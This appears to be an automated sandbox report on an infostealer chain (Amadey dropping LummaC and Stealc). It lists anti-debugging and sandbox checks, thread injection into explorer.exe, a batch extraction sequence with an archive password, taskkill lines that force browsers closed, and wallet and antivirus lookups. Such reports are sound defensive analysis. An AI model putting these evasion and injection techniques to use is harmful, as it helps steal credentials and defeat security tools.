Source: file.exe, 00000000.00000000.1638460813.0000000000C72000.00000080.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1691482436.0000000000C72000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000000.1668966765.00000000004D2000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000001.00000002.1724052545.00000000004D2000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1724729033.00000000004D2000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000000.1671951136.00000000004D2000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2989176568.00000000004D2000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000000.2321874061.00000000004D2000.00000080.00000001.01000000.00000008.sdmp, 847ee125a0.exe, 00000024.00000002.2991667736.0000000000813000.00000040.00000001.01000000.0000000F.sdmp, 6bf436adc7.exe, 00000025.00000002.2718373434.0000000000D85000.00000040.00000001.01000000.00000010.sdmp, 847ee125a0.exe, 00000027.00000002.2989826293.0000000000813000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: PING.EXE, 00000023.00000002.2595964879.00000238678A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllwwCMP
Source: PING.EXE, 0000001E.00000002.2582170527.000001F5F91DD000.00000004.00000020.00020000.00000000.sdmp, da3bdc2ac0.exe, 00000026.00000003.2731096836.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2911792267.000001EB27A04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04FB0AD5 rdtsc 0_2_04FB0AD5
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 7_2_00402665
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB652B mov eax, dword ptr fs:[00000030h] 0_2_00AB652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ABA302 mov eax, dword ptr fs:[00000030h] 0_2_00ABA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0031A302 mov eax, dword ptr fs:[00000030h] 1_2_0031A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0031652B mov eax, dword ptr fs:[00000030h] 1_2_0031652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0031A302 mov eax, dword ptr fs:[00000030h] 2_2_0031A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0031652B mov eax, dword ptr fs:[00000030h] 2_2_0031652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0031A302 mov eax, dword ptr fs:[00000030h] 6_2_0031A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0031652B mov eax, dword ptr fs:[00000030h] 6_2_0031652B
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 6bf436adc7.exe PID: 3896, type: MEMORYSTR
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5344 base: 463010 value: 00
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Thread register set: target process: 5344
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe "C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe "C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe "C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 7_2_00402744
Source: da3bdc2ac0.exe, 00000026.00000002.2821865455.0000000000792000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, 00000000.00000002.1692166040.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1724294598.0000000000517000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1725037401.0000000000517000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: KProgram Manager
Source: 847ee125a0.exe, 847ee125a0.exe, 00000024.00000002.2991667736.0000000000813000.00000040.00000001.01000000.0000000F.sdmp, 847ee125a0.exe, 00000027.00000002.2989826293.0000000000813000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: \4Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002FDD91 cpuid 6_2_002FDD91
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 7_2_0040247D
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013565001\06c8dc661c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013565001\06c8dc661c.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00A9CBEA
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA, 7_2_00405BFC
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: 847ee125a0.exe, 00000024.00000003.2735720366.0000000000CE7000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2728328918.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2735654272.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2748896116.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2995066427.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2996848626.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2728221132.0000000000CE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.file.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1723431673.00000000002E1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690432251.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2988037651.00000000002E1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1724434533.00000000002E1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: da3bdc2ac0.exe PID: 5368, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 847ee125a0.exe PID: 8180, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 847ee125a0.exe PID: 2248, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000025.00000003.2660381905.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2719200023.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2718154872.00000000009B1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6bf436adc7.exe PID: 3896, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 847ee125a0.exe, 00000024.00000003.2726906842.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets
